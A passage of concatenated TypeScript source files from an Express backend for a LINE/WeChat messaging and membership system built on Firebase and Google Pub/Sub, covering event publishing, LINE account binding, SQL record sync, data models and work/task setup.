eventService.createEvent(eventObj).then(async () => {
let eventArray: Array<Promise<any>> = []
await Promise.all(eventArray)
// messagePub(eventObj.id)
res.status(200).send(eventObj.id)
})
}).catch(error => {
console.log(error)
res.sendStatus(403)
})
})
router.post("/publish", async (req, res) => {
if (req.body.hasOwnProperty("id")) {
console.log("messagePub:", req.body.id)
messagePub(req.body.id)
res.sendStatus(200)
} else {
res.sendStatus(403)
}
})
const messagePub = (id: string) => {
let data: PubSubEvent = {
id: id,
timeStamp: new Date().getTime()
}
console.log("===messagePub data===", data)
const dataBuffer = Buffer.from(JSON.stringify(data));
googlePubsub.topic(messageTopicName).publisher().publish(dataBuffer)
console.log("===messagePub success===")
}
if (pubsubSwitch) {
const messageSubscription = googlePubsub.subscription(pubsubConfig.subName + pubsubConfig.messageSubName);
messageSubscription.on('message', async messageSub => {
let event: PubSubEvent = JSON.parse(Buffer.from(messageSub.data, 'base64').toString())
console.log("=====message Subscription==========", event)
if (event.hasOwnProperty('id')) {
console.log("event", event)
let messages: MessageTemplate = { content: "", id: "", title: "", channel: "Line", urls: [], thumb: "", type: "text" }
let eventData = await eventService.getEvent(event.id)
const receivers: Receiver[] = await eventService.getEventServices(event.id)
let sender: User = {
id: "system",
name: "系統",
email: "<EMAIL>",
role: "staff"
}
// if (eventData.messageId) {
// let messageSnapShots = await messageService.getMessageTemplate(eventData.messageId)
// if (messageSnapShots.exists) {
messages = {
id: "",
title: "",
content: "",
urls: [],
thumb: "",
channel: eventData.channel as MessageTemplate['channel'],
type: ""
}
if (eventData.hasOwnProperty("content") && eventData.content != "") {
messages.content = eventData.content
}
if (eventData.hasOwnProperty("type") && eventData.type != "") {
messages.type = eventData.type
}
if (eventData.hasOwnProperty("sender")) {
if (eventData.sender.hasOwnProperty("id")) {
sender = eventData.sender
} else {
sender.name = eventData.sender.toString()
}
}
if (eventData.hasOwnProperty("urls")) {
messages.urls = eventData.urls
}
if (eventData.hasOwnProperty("thumb")) {
messages.thumb = eventData.thumb
}
// }
// }
console.log("===messages===", messages)
// const itemData = await workService.getItemById(eventData.workId, eventData.taskId, eventData.itemId)
// if (itemData && itemData.length > 0) {
axios.post(`http://localhost:${PORT}/push/pushMessage`, {
sender: sender,
messageObj: messages ? messages : "",
receivers: receivers
}).then(success => {
console.log("======Message Send Success==========", success.data)
}).catch(err => {
console.log("======Message Send Err==========", err)
})
// } else {
// }
} else if (event.hasOwnProperty('receivers')) {
}
messageSub.ack()
})
}
export default router<file_sep>/src/bindingWS.ts
import { Router } from "express"
import * as structureService from './services/structureService'
import * as loginService from './services/loginService';
import * as memberService from './services/memberService'
import { pushMessage } from './services/chatbotService';
import * as driveService from "./services/driveService"
import { Client, validateSignature, WebhookEvent, Message, TextMessage, TemplateMessage } from "@line/bot-sdk"
import * as config from './config';
import * as receiverService from './services/receiverService';
import * as admin from 'firebase-admin';
import { IssueOrganization, GroupOrganization, Group, MemberOrganization, Member } from './model';
const uuidv4 = require('uuid').v4;
const router = Router()
router.post('/Binding', async function (req, res) {
const applicationName = config.appName
const lineId = req.body.lineId
const data = req.body.data
const name = req.body.name
const action = req.body.action
console.log("---data", data)
console.log("---lineId", lineId)
console.log("---action", action)
let result
if (lineId != null && lineId != "guest") {
switch (action) {
case "fileVersion":
result = fileVersion(lineId, data)
res.send(result)
break
case "productInfo":
result = productInfo(lineId, data)
res.send(result)
break
case "login":
result = await login(lineId, data, applicationName).catch(err => {
res.status(403).send(err)
})
console.log("result", result)
res.send(result)
break
case "groupBinding":
result = await groupBinding(lineId, data, applicationName).then(() => {
}).catch(err => {
res.status(403).send(err)
})
console.log("result", result)
res.send(result)
break
default:
break
}
} else {
res.sendStatus(200)
}
});
router.post('/initialization', async function (req, res) {
const email = "<EMAIL>"
const mobile = "0911222333"
const name = "系統管理員"
await initialization({ email, mobile, name }).then(DBInfo => {
console.log("DBInfo", DBInfo)
res.status(200).send(DBInfo)
}).catch(err => {
res.status(403).send(err)
})
});
const login = async (lineId: string, data: any, applicationName: string) => {
const personalId = ""
let password = <PASSWORD>
if (password) {
return memberService.getMemberByAnyId(lineId).then(snapshot => {
if (snapshot.size < 1) { // 確認 此PersonalId已註冊數量
// personalId尚未被綁定
return registeration(lineId, personalId, password, applicationName)
} else {
//personalId被綁定過
let users = []
snapshot.forEach(doc => users.push(doc.data()))
for (let i = 0; i < users.length; i++) {
if (!users[i]["unfollow"] || users[i]["unfollow"] == false) {
console.log(`${lineId}重複綁定,PID:[${personalId}]`)
// return Promise.reject("此帳號已被綁定, 請勿重複登入")
}
}
return registeration(lineId, personalId, password, applicationName)
}
})
// return existSale(lineId, personalId, password)
// return registeration(lineId, personalId, password, applicationName)
} else
return Promise.reject("請輸入帳號密碼")
}
const registeration = (platformId, personalId, password, applicationName) => {
return loginService.tempLogin(personalId, password, platformId).then(async result => {
if (platformId.length == config.idLength.LINE) {
result["lineId"] = platformId
result["lineBindingAt"] = +Date.now()
} else if (platformId.length == config.idLength.WECHAT) {
result["wechatId"] = platformId
result["wechatBindingAt"] = +Date.now()
}
result["errorCounter"] = 0
result["isActive"] = true
result["unfollow"] = false
if (!result.hasOwnProperty("path")) { result["path"] = "" }
if (!result.hasOwnProperty("lineId")) { result["lineId"] = "" }
if (!result.hasOwnProperty("wechatId")) { result["wechatId"] = "" }
return driveService.authorize().then(auth => {
const now = +Date.now()
let newUid = uuidv4()
let companyInfo: MemberOrganization = {
parentId: result.id, name: "我的通訊錄", type: "department", id: newUid
}
let structureInfo: IssueOrganization = {
parentId: result.id, name: "我的議題", type: "system", id: newUid
}
let groupInfo: GroupOrganization = {
parentId: result.id, name: "我的群組", type: "system", id: newUid
}
return driveService.getFileByName(result.id).then(async folders => {
if (folders.empty) {
await driveService.createFile(auth, result.id, config.personalRootFolderId, "folder", now).then(folderId => {
console.log("folderId:", folderId)
driveService.createFile(auth, "保存", folderId, "folder", now).then(() => {
}).catch(err => {
console.log("error:", err.response)
})
}).catch(err => {
console.log("error:", err.response)
})
}
await structureService.getStructureByParentId(result.id).then(issueSnapshot => {
if (issueSnapshot.empty) {
structureService.setStructure(structureInfo)
}
})
// await groupOrganizationService.getGroupByParentId(result.id).then(groupSnapshot => {
// if (groupSnapshot.empty) {
// groupOrganizationService.updateGroup(groupInfo)
// }
// })
return receiverService.getReceiverByParentId(result.id).then(orgSnapshot => {
if (orgSnapshot.empty) {
receiverService.setReceiver(companyInfo).catch(err => {
console.log(err)
return Promise.resolve("ok")
})
}
let lineMsg = {
type: "text",
text: `感謝${result.name} ,加入《${applicationName}》。請點選主選單,開始體驗智能世代下的通訊協作。`
}
pushMessage(platformId, lineMsg)
return memberService.setMember(result).then(async () => {
let firebaseToken = await generateFirebaseToken(platformId).catch(error => {
console.log("generateFirebaseToken error:", error)
})
console.log("----------", firebaseToken)
return firebaseToken
}).catch(err => {
console.log(err)
return Promise.resolve("ok")
})
})
})
});
}).catch(error => {
console.log(error)
return Promise.reject(error)
})
}
const groupBinding = (lineId: string, data: any, applicationName: string) => {
return new Promise<any>(async (resolve, reject) => {
let groupName = data.groupName
let groupId = data.groupId
if (groupName && groupId) {
let memberSnapshot = await memberService.getMemberByAnyId(lineId)
let member: Member
if (memberSnapshot.empty) {
console.log("====Member不存在====")
} else {
member = memberSnapshot.docs[0].data() as Member
let newGroups: Member["lineGroup"] = []
if (member.hasOwnProperty("lineGroup")) {
newGroups = member.lineGroup
}
newGroups.push({ groupId: groupId, name: groupName })
member = {
...member,
lineGroup: newGroups
}
await memberService.setMember(member)
}
resolve()
// receiverService.getReceiverByParentId(memberSnapshot.docs[0].data().id).then(orgSnapshot => {
// groupService.getGroupBylineId(groupId).then(snapshot => {
// if (snapshot.size < 1) { // 確認 此PersonalId已註冊數量
// // personalId尚未被綁定
// // return registeration(lineId, personalId, password, applicationName)
// let newUid = uuidv4()
// let groupData: Group = {
// id: newUid,
// name: groupName,
// ownerId: memberSnapshot.docs[0].data().id,
// lineId: groupId,
// childrenId: [{ id: memberSnapshot.docs[0].data().id, name: memberSnapshot.docs[0].data().name }]
// // path: "",
// // role: "private",
// }
// let groupOrgData: GroupOrganization = {
// type: "group",
// id: newUid,
// name: groupName,
// parentId: orgSnapshot.docs[0].data().id,
// groupId: newUid,
// ownerId: memberSnapshot.docs[0].data().id
// }
// groupOrganizationService.updateGroup(groupOrgData)
// groupService.updateGroup(groupData).then(() => {
// resolve()
// })
// } else {
// resolve()
// }
// }).catch(() => {
// reject("無法新增至我的群組")
// })
// }).catch(() => {
// reject("無法新增至我的群組")
// })
} else
reject("請輸入帳號密碼")
})
}
const initialization = (accInfo: any) => {
return new Promise<any>(async (resolve, reject) => {
let newUid = uuidv4()
let firebaseDesktop = await createFirebaseAccount(accInfo.email, accInfo.mobile, accInfo.name).catch(error => {
console.log("DesktopFirebaseToken error:", error)
})
await login("", { mobilePhone: accInfo.mobile }, config.appName).catch(err => {
reject(err)
})
resolve()
})
}
const productInfo = (lineId: string, data: any) => {
let productName = data.productName
let fileId = data.fileId
let type = data.type
let url = `${config.uriName}#/pdf/${lineId}/`
let lineMsgArray = []
// let lineMsg = {
// type: "template",
// altText: `${productName}_${type}`,
// template: {
// type: "confirm",
// text: `${productName}_${type}`,
// actions: []
// }
// }
let lineMsg = {
type: "template",
altText: `${productName}_${type}`,
template: {
type: "buttons",
text: `${productName}`,
actions: []
}
}
if (fileId == undefined || fileId.length == 0) {
lineMsg.template.actions.push({
"type": "postback",
"label": type,
"data": `action=fileNotFound&fileName=${productName}${type}`
})
} else {
// lineMsg.template.actions.push(
// {
// "type": "uri",
// "label": "檢視",
// "uri": url + fileId
// }, {
// "type": "uri",
// "label": "轉傳",
// "uri": `${config.uriName}#/forward/${lineId}/${fileId}/${type}`
// }
// )
lineMsg.template.actions.push(
{
"type": "uri",
"label": `${type}`,
"uri": url + fileId
}
)
}
lineMsgArray.push(lineMsg)
pushMessage(lineId, lineMsgArray)
return "OK"
}
const fileVersion = (lineId: string, data: any) => {
const folderId = data.folderId
const name = data.name
const path = data.path
console.log("folderId", folderId)
console.log("name", name)
console.log("path", path)
let lineMsg: TemplateMessage = {
type: "template",
altText: `${name}`,
template: {
type: "buttons",
text: `${path}`,
actions: [
{
type: "uri",
label: `${name}`,
uri: `${config.uriName}#/pdf/${lineId}/${folderId}`
}
]
}
}
pushMessage(lineId, lineMsg)
return "OK"
}
function generateFirebaseToken(userId: string) {
let firebaseUid = userId;
// admin.auth().dis
return admin.auth().createCustomToken(firebaseUid);
}
function createFirebaseAccount(email: string, mobile: string, name: string) {
return admin.auth().createUser({
email: email,
password: <PASSWORD>,
displayName: name
});
}
export default router
<file_sep>/src/DBsync.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as Moment from "moment-timezone"
import * as menuService from './services/menuService'
import * as memberService from "./services/memberService"
import * as receiverService from "./services/receiverService"
import { jsonMember, Item, Member, MemberOrganization } from "./model"
const router = Router()
router.post("/connectSQL", async (req, res) => {
const recordsets = req.body as any[]
console.log("----connectSQL body-------------")
console.log(JSON.stringify(recordsets, null, 4))
res.sendStatus(200)
if (recordsets[0].memberName) {
await importMemberRecordset(recordsets)
} else if (recordsets[0].workName == "拜訪") {
await importVisitActivityRecordset(recordsets)
} else if (recordsets[0].workName == "課程") {
await importCourseActivityRecordset(recordsets)
}
})
/**
* 課程model轉換
* @param recordsets
*/
const importCourseActivityRecordset = async (recordsets) => {
let activity: Item
let activityUploads: Item[] = []
for (const data of recordsets) {
let start = Moment(data.startDate).format("YYYY/MM/DD")
let end = Moment(data.endDate).format("YYYY/MM/DD")
activity = {
id: data.id,
name: data.courseName.trim(),
index: new Date(start).getTime(),
data: {
period: start + " - " + end,
address: data.address.trim(),
location: data.location.trim(),
time: "",
}
}
activityUploads.push(activity)
}
console.log("----------Course------------", activityUploads)
await importCourseActivity(activityUploads)
}
/**
* 拜訪model轉換
* @param recordsets
*/
const importVisitActivityRecordset = async (recordsets) => {
let activity: Item
let activityUploads: Item[] = []
for (const data of recordsets) {
let start = Moment(data.startDate).format("YYYY/MM/DD")
let end = Moment(data.endDate).format("YYYY/MM/DD")
activity = {
id: data.id,
name: data.cityName.trim() + "拜訪 (" + start + " - " + end + ")",
index: new Date(start).getTime(),
data: {
period: start + " - " + end,
address: data.address.trim(),
location: data.location.trim(),
time: "",
invitationUrl: data.invitationUrl,
nursingUrl: data.nursingUrl,
volunteerUrl: data.volunteerUrl
}
}
activityUploads.push(activity)
}
console.log("-----------Visit------------", activityUploads)
await importVisitActivity(activityUploads)
}
/**
* 成員model轉換
* @param recordsets
*/
const importMemberRecordset = async (recordsets) => {
let member: jsonMember
let memberUploads: jsonMember[] = []
for (const data of recordsets) {
console.log("-------SQLDB member result---------\n", data)
let date = data.meetingDate.replace("年", "/").replace("月", "/").replace("日", "/")
member = {
memberId: data.memberId,
organizationId: data.participantId,
personalId: "",
name: data.memberName,
title: "",
division: data.division,
department: data.department,
mobilePhone: data.mobilePhone,
email: data.email,
lineId: data.lineId,
wechatId: data.wechatId,
meetingDate: date,
meetingTime: data.meetingTime ? data.meetingTime : "",
meetingLocation: data.meetingLocation,
preEventMeeting: data.preEventMeeting,
unitIndex: 0,
referrer: ""
}
memberUploads.push(member)
}
const nodeSnapshot = await receiverService.getReceiverByNameAndParentId(recordsets[0].visitFlowName.trim(), recordsets[0].sessionId)
console.log("-------組織根節點ID---------\n", nodeSnapshot.docs[0].data().id)
await importMember(memberUploads, nodeSnapshot.docs[0].data().id)
}
/**
* 同步課程梯次
* @param activityUploads
*/
const importCourseActivity = async (activityUploads: Item[]) => {
for (const activityUpload of activityUploads) {
if (activityUpload.name != "") {
let memberReceiverBefore: MemberOrganization = {
id: uuidv4(),
name: "課前",
type: "department",
index: new Date().getTime(),
childrenId: [],
parentId: activityUpload.id
}
let memberReceiverAfter: MemberOrganization = {
id: uuidv4(),
name: "課中",
type: "department",
index: new Date().getTime(),
childrenId: [],
parentId: activityUpload.id
}
await menuService.setBeforeCourseActivity(activityUpload)
console.log("====課前梯次建立 / 更新成功====")
memberReceiverBefore.parentId = activityUpload.id
await menuService.setAfterCourseActivity(activityUpload)
console.log("====課中梯次建立 / 更新成功====")
memberReceiverAfter.parentId = activityUpload.id
const snapshotBefore = await receiverService.getReceiverByNameAndParentId("課前", memberReceiverBefore.parentId)
if (!snapshotBefore.empty)
memberReceiverBefore = snapshotBefore.docs[0].data() as MemberOrganization
const snapshotAfter = await receiverService.getReceiverByNameAndParentId("課中", memberReceiverAfter.parentId)
if (!snapshotAfter.empty)
memberReceiverAfter = snapshotAfter.docs[0].data() as MemberOrganization
// 建立/更新 成員組織根節點
await receiverService.setReceiver(memberReceiverBefore)
await receiverService.setReceiver(memberReceiverAfter)
console.log("====課前 / 中成員組織根節點建立成功====")
}
}
}
/**
* 同步拜訪梯次
* @param activityUploads
*/
const importVisitActivity = async (activityUploads: Item[]) => {
for (const activityUpload of activityUploads) {
if (activityUpload.name != "") {
// const beforeActivities = await menuService.getBeforeActivityByNmae(activityUpload.name)
// const afterActivities = await menuService.getAfterActivityByNmae(activityUpload.name)
let memberReceiverBefore: MemberOrganization = {
id: uuidv4(),
name: "拜訪前",
type: "department",
parentId: activityUpload.id,
index: new Date().getTime(),
childrenId: []
}
let memberReceiverAfter: MemberOrganization = {
id: uuidv4(),
name: "拜訪後",
type: "department",
parentId: activityUpload.id,
index: new Date().getTime(),
childrenId: []
}
await menuService.setBeforeActivity(activityUpload)
console.log("====拜訪前梯次建立 / 更新成功====")
memberReceiverBefore.parentId = activityUpload.id
await menuService.setAfterActivity(activityUpload)
console.log("====拜訪後梯次建立 / 更新成功====")
memberReceiverAfter.parentId = activityUpload.id
const snapshotBefore = await receiverService.getReceiverByNameAndParentId("拜訪前", memberReceiverBefore.parentId)
if (!snapshotBefore.empty)
memberReceiverBefore = snapshotBefore.docs[0].data() as MemberOrganization
const snapshotAfter = await receiverService.getReceiverByNameAndParentId("拜訪後", memberReceiverAfter.parentId)
if (!snapshotAfter.empty)
memberReceiverAfter = snapshotAfter.docs[0].data() as MemberOrganization
// 建立/更新 成員組織根節點
await receiverService.setReceiver(memberReceiverBefore)
await receiverService.setReceiver(memberReceiverAfter)
console.log("====拜訪前 / 後成員組織根節點建立成功====")
}
}
}
/**
* 同步成員名單
* @param memberUploads
* @param nodeId
*/
const importMember = async (memberUploads: jsonMember[], nodeId: string) => {
const rootSnapshot = await receiverService.getReceiverById(nodeId)
if (!rootSnapshot.empty) {
console.log("====組織根節點存在====")
const rootOrg = rootSnapshot.docs[0].data() as MemberOrganization
for (const memberUpload of memberUploads) {
/**
* Member主檔是否存在
*/
// const memberSnapshot = await memberService.getMembersByMobilePhoneAndName(memberUpload.mobilePhone.trim(), memberUpload.name.trim())
const memberSnapshot = await memberService.getMemberByAnyId(memberUpload.memberId)
let member: Member
if (memberSnapshot.empty) {
console.log("====Member不存在====")
// 不存在則建立Member
member = {
id: memberUpload.memberId,
name: memberUpload.name.trim(),
title: memberUpload.title.trim(),
division: memberUpload.division.trim(),
department: memberUpload.department.trim(),
email: memberUpload.email.trim(),
mobilePhone: memberUpload.mobilePhone.trim(),
lineId: memberUpload.lineId ? memberUpload.lineId.trim() : "",
wechatId: memberUpload.wechatId ? memberUpload.wechatId.trim() : "",
data: {
meetingDate: memberUpload.meetingDate ? memberUpload.meetingDate.trim() : "",
meetingTime: memberUpload.meetingTime ? memberUpload.meetingTime.trim() : "",
meetingLocation: memberUpload.meetingLocation ? memberUpload.meetingLocation.trim() : "",
preEventMeeting: memberUpload.preEventMeeting ? memberUpload.preEventMeeting.trim() : "",
},
role: "customer",
index: new Date().getTime(),
unReadMessages: 0
}
} else {
console.log("====Member已存在====")
// 若存在則檢查是否更新職稱、部門、單位、電話、Email
member = memberSnapshot.docs[0].data() as Member
if (memberUpload.name && memberUpload.name !== "")
member.name = memberUpload.name.trim()
if (memberUpload.email && memberUpload.email !== "")
member.email = memberUpload.email.trim()
if (memberUpload.mobilePhone && memberUpload.mobilePhone !== "")
member.mobilePhone = memberUpload.mobilePhone.trim()
if (memberUpload.title && memberUpload.title !== "")
member.title = memberUpload.title.trim()
if (memberUpload.division && memberUpload.division !== "")
member.division = memberUpload.division.trim()
if (memberUpload.department && memberUpload.department !== "")
member.department = memberUpload.department.trim()
if (memberUpload.meetingDate && memberUpload.meetingDate !== "")
member.data.meetingDate = memberUpload.meetingDate.trim()
if (memberUpload.meetingTime && memberUpload.meetingTime !== "")
member.data.meetingTime = memberUpload.meetingTime.trim()
if (memberUpload.meetingLocation && memberUpload.meetingLocation !== "")
member.data.meetingLocation = memberUpload.meetingLocation.trim()
if (memberUpload.preEventMeeting && memberUpload.preEventMeeting !== "")
member.data.preEventMeeting = memberUpload.preEventMeeting.trim()
// 若存在則檢查是否更新LineId、WeChatId
if (memberUpload.lineId && memberUpload.lineId !== "")
member.lineId = memberUpload.lineId.trim()
if (memberUpload.wechatId && memberUpload.wechatId !== "")
member.wechatId = memberUpload.wechatId.trim()
}
await memberService.setMember(member)
console.log("====member建立 / 更新成功====")
if (rootOrg.type == "department") {
if (rootOrg.childrenId.indexOf(member.id) < 0)
rootOrg.childrenId.push(member.id)
}
let parentId = nodeId
if (memberUpload.division && memberUpload.division !== "") {
/**
* 檢察部門是否存在
*/
const divsionSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.division.trim(), nodeId)
let divsionReceiver: MemberOrganization
if (divsionSnapshot.empty) {
console.log("====Divsion不存在====")
// 不存在則建立部門
divsionReceiver = {
id: uuidv4(),
name: memberUpload.division.trim(),
type: "department",
parentId: nodeId,
index: memberUpload.unitIndex,
childrenId: [member.id]
}
} else {
console.log("====Divsion存在====")
divsionReceiver = divsionSnapshot.docs[0].data() as MemberOrganization
if (divsionReceiver.type == "department") {
if (divsionReceiver.childrenId.indexOf(member.id) < 0) {
console.log("====將member存進Divsion====")
divsionReceiver.childrenId.push(member.id)
}
}
}
await receiverService.setReceiver(divsionReceiver)
parentId = divsionReceiver.id
}
if (memberUpload.department && memberUpload.department !== "") {
/**
* 檢查單位是否存在
*/
const departmentSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.department.trim(), parentId)
let departmentReceiver: MemberOrganization
if (departmentSnapshot.empty) {
console.log("====Department不存在====")
// 不存在則建立單位
departmentReceiver = {
id: uuidv4(),
name: memberUpload.department.trim(),
type: "department",
parentId: parentId,
index: new Date().getTime(),
childrenId: [member.id]
}
} else {
console.log("====Department存在====")
departmentReceiver = departmentSnapshot.docs[0].data() as MemberOrganization
if (departmentReceiver.type == "department") {
if (departmentReceiver.childrenId.indexOf(member.id) < 0) {
console.log("====將member存進Department====")
departmentReceiver.childrenId.push(member.id)
}
}
}
await receiverService.setReceiver(departmentReceiver)
parentId = departmentReceiver.id
}
/**
* 檢查此部門單位是否已有此成員
*/
const memberOrgSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.name.trim(), parentId)
if (memberOrgSnapshot.empty) {
console.log("====MemberReceiver不存在====")
// 不存在則建立成員節點
const memberReceiver: MemberOrganization = {
id: memberUpload.organizationId,
name: memberUpload.name.trim(),
type: "member",
memberId: member.id,
parentId: parentId,
index: new Date().getTime()
}
await receiverService.setReceiver(memberReceiver)
} else {
console.log("====MemberReceiver存在====")
}
console.log("--------------------------------------------------")
}
await receiverService.setReceiver(rootOrg)
} else {
console.log("====組織根節點不存在====")
}
}
export default router<file_sep>/src/model.ts
import * as Line from '@line/bot-sdk';
import { Channel } from '@google-cloud/storage';
export type Member = {
id: string
name: string
title?: string
division?: string
department?: string
email: string
mobilePhone: string
businessPhone?: string
lineId: string
wechatId: string
role?: "manager" | "staff" | "student" | "customer"
sid?: string //學號、員工編號
path?: string
index?: number
student?: string
data?: any,
lineGroup?: { groupId: "", name: "" }[]
unReadMessages: number // type == Member || type == Line || type == WeChat 才有此欄位
session?: string
groupId?: string
}
export type User = {
id: string
name: string
email: string
role: "admin" | "manager" | "staff"
}
export type MemberOrganization = ({
type: "department" | "Work" | "Task" | "Item" | "Flow" | "Line" | "WeChat" | "Email" | "SMS"
childrenId?: any[] //組織下的所有人
} | {
type: "member"
memberId?: string //對應 Member Collection 的id
channelId?: string // type == Line || type == WeChat 才有此欄位
}) & {
id: string
index?: number //排序
parentId: string
name: string
member?: Member
}
export type Menu = {
id: string
parentId: string
name: string
index: number
role?: "manager" | "staff" | "student" | "customer"
ownerId?: string
}
export type MenuCsv = {
id: string
business: string
event: string
work: string
index: number
role?: string
ownerId?: string
}
export type Friend = {
id: string
}
/**
* 2018/10/14
*/
export type Work = {
id: string
name: string
index: number
tasks?: Task[]
}
export type Task = {
id: string
name: string
index: number
items?: Item[]
}
export type Item = {
id: string
name: string
index: number
flows?: Flow[]
data?: ItemData
}
export type ItemData = {
period: string,
location: string,
address: string,
time?: string,
invitationUrl?: string,
nursingUrl?: string,
volunteerUrl?: string
}
export type MemberData = {
memberName?: string,
invitationUrl?: string,
meetingDate?: string,
meetingTime?: string,
meetingLocation?: string,
preEventMeeting?: string
}
export type Flow = {
id: string
name: string
index: number
messageId: string
}
export type WorkUpload = {
index: number
role?: string
work: string
task?: string
activity?: string
date?: string
time?: string
address?: string
location?: string
invitationUrl?: string
nursingUrl?: string
volunteerUrl?: string
}
//////////////////////////////
export type Channel = {
line: boolean
wechat: boolean
sms: boolean
email: boolean
}
export type Catalog = {
id: string
name: string
index: number
messageId: string[]
type: "dynamic" | "static"
userId: string
}
export type MessageTemplate = {
id: string
title: string
content: string
urls?: { name: string, url: string }[]
thumb: string
type: string
channel?: "Line" | "WeChat" | "SMS" | "Email"
}
export type MessageRecord = {
id: string
workId: string
taskId: string
itemId: string
flowId: string
sender: Member
timeStamp: number
sendCount: number
successCount: number
readCount: number
title: string
type: MessageTemplate["type"],
channel: string
}
export type RecordDetail = {
id: string
receiver: Member
channel: MessageTemplate['channel']
message: string
urls?: MessageTemplate["urls"]
thumb?: string
isSucceed: boolean
receiveTime: number
read: boolean
}
export type ChatMessage = {
id: string
}
export type GARecord = {
action: string
label: {
filename: string
trackId: string
}
count: number
duration: number
}
export type File = {
id: string
mimeType: string
name: string
sid: number
fullName: string
parents: string
parentsName: Parents[]
docId: string
modifiedDate: number
createdTime: number
modifiedTime: number
}
export type Parents = {
id?: string
name?: string
fullName?: string
}
export type Message = {
type: string
textMessage?: Line.TextMessage
imageMapMessage?: Line.ImageMapMessage
buttonsMessage?: Line.TemplateButtons
confirmMessage?: Line.TemplateConfirm
carouselMessage?: Line.TemplateCarousel
imageCarouselMessage?: Line.TemplateImageCarousel
imageMessage?: Line.ImageMessage
videoMessage?: Line.VideoMessage
audioMessage?: Line.AudioMessage
locationMessage?: Line.LocationMessage
stickerMessage?: Line.StickerMessage
}
/**
* DBsync
*/
export type jsonMember = {
memberId: string,
organizationId: string,
personalId: string,
name: string,
title: string,
division: string,
department: string,
mobilePhone: string,
email: string,
lineId?: string,
wechatId?: string,
meetingDate?: string,
meetingTime?: string,
meetingLocation?: string,
preEventMeeting?: string,
unitIndex?: number,
referrer?: string
}
//MQ版系統整合
export type ScheduleEvent = PubSubEvent
export type PubSubEvent = {
id: string
timeStamp: number
}
export type Event = {
id: string
// workId: string
// taskId: string
// itemId: string
// flowId: string
// messageId: string
timeStamp: number
content: string
// files: File[]
urls: MessageTemplate["urls"]
thumb: string
type?: MessageTemplate["type"]
receivers: Member[]
sender: User
channel: string
}
export type EventResult = {
id: string
messageId: string | string[]
content: string
urls?: MessageTemplate["urls"]
thumb?: string
files?: File[]
channel: string
sender: User
// receivers: {
// id: string
// data: any[]
// }[]
// receivers: Member[]
timeStamp: number
type?: MessageTemplate["type"]
}
export type ReviewMessage = {
id: string
/**
* 0: 未處理
* 1: 通過 / 未發送
* 2: 通過 / 已發送
* 3: 未通過
*/
state: 0 | 1 | 2 | 3
content: string
channel: MessageTemplate['channel']
sender: User
// receivers: { id: string, data: any[] }[]
expectTime: number
urls: MessageTemplate['urls']
type: "immediate" | "delay"
auditor: User
receiverCount: number
}
export type Issue = {
id: string
name: string
ownerId: string //建立這議題的人
childrenId: [{ id: string, name: string }] //此議題所有參與者
}
export type IssueOrganization = ({
type: "structure" | "system"
} | {
type: "issue"
issueId: string //對應 Issue Collection 的id
ownerId: string //這份議題是屬於哪個人的
}) & {
id: string
parentId: string
name: string
}
export class Group {
id: string
name: string
ownerId: string
// childrenId?: [{ id: string, name: string }]
memberId: string[]
// lineId?: string
}
export class BatchGroup {
id: string
name: string
ownerId: string
members: { id: string, content: string }[]
}
export type GroupOrganization = ({
type: "structure" | "system"
} | {
type: "group"
groupId: string
ownerId: string
}) & {
id: string
parentId: string
name: string
}
export type Receiver = {
id: string
data: any[]
index: number
}<file_sep>/src/services/organizationService.ts
// import * as admin from 'firebase-admin';
// import { Receiver } from '../model';
// const organizationCollection = admin.firestore().collection("MemberOrganization");
// export const updateOrganization = function (org: Receiver) {
// return organizationCollection.doc(org.id).set(org, { merge: true })
// }
// export const getOrganizationById = function (id: string) {
// return organizationCollection.where("id", "==", id).get()
// }
// export const getOrganizationByParentIdAndActivityId = function (parentId: string, activityId: string) {
// return organizationCollection
// .where("parentId", "==", parentId)
// .where("activityId", "==", activityId).get()
// }
// export const getOrganizationByParentId = function (parentId: string) {
// return organizationCollection.where("parentId", "==", parentId).get()
// }
// export const getOrganizationByType = function (type: string) {
// return organizationCollection.where("type", "==", type).get()
// }
// export const getOrganizationByMemberId = function (memberId: string) {
// return organizationCollection.where("memberId", "==", memberId).get()
// }
// export const getOrganizationByName = function (name: string) {
// return organizationCollection.where("name", "==", name).get()
// }
// export const getOrganizationByNameAndParentId = function (name: string, parentId: string) {
// return organizationCollection.where("name", "==", name).where("parentId", "==", parentId).get()
// }
// export const getOrganizationByMemberIdAndParentId = function ( memberId: string, parentId: string) {
// return organizationCollection.where("memberId", "==", memberId).where("parentId", "==", parentId).get()
// }
// export const getOrganizations= function () {
// return organizationCollection.get()
// }<file_sep>/src/workWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as driveService from "./services/driveService"
import * as receiverService from "./services/receiverService"
import * as workService from "./services/workService"
import { Work, Task, Item, Flow, WorkUpload, MemberOrganization } from "./model"
import * as config from './config';
const router = Router()
router.post("/createWorks", async (req, res) => {
const workUploads = req.body as WorkUpload[]
for (const workUpload of workUploads) {
console.log(JSON.stringify(workUpload, null, 4))
let work: Work
let task: Task
if (workUpload.work != "") {
const works = await workService.getWorkByName(workUpload.work)
/**
* 檢查主功能 Work是否存在
*/
if (works.length == 0) {
// 不存在則建立
console.log("====建立Work====", workUpload.work)
const newWork: Work = {
id: uuidv4(),
name: workUpload.work,
index: workUpload.index
}
await workService.setWork(newWork)
work = newWork
} else
work = works[0]
/**
* 次選項 Task
*/
if (workUpload.task != "") {
const tasks = await workService.getTaskByName(work.id, workUpload.task)
let memberReceiver: MemberOrganization = {
id: uuidv4(),
name: workUpload.task,
type: "department",
index: new Date().getTime(),
childrenId: [],
parentId: ""
}
if (tasks.length == 0) {
// 不存在則建立
console.log("====建立Task====", workUpload.task)
const newTask: Task = {
id: uuidv4(),
name: workUpload.task,
index: +workUpload.index
}
await workService.setTask(work.id, newTask)
memberReceiver.parentId = newTask.id
task = newTask
} else {
task = tasks[0]
memberReceiver.parentId = tasks[0].id
}
if (workUpload.activity == "") {
const snapshot = await receiverService.getReceiverByNameAndParentId(workUpload.task, memberReceiver.parentId)
if (!snapshot.empty)
memberReceiver = snapshot.docs[0].data() as MemberOrganization
// 建立/更新 成員組織根節點
console.log("====建立成員組織根節點====")
await receiverService.setReceiver(memberReceiver)
}
const now = +Date.now()
await driveService.authorize().then(auth => {
return driveService.getFileByName(workUpload.work).then(async businessFolder => {
let businessFolderInfo = { id: "" }
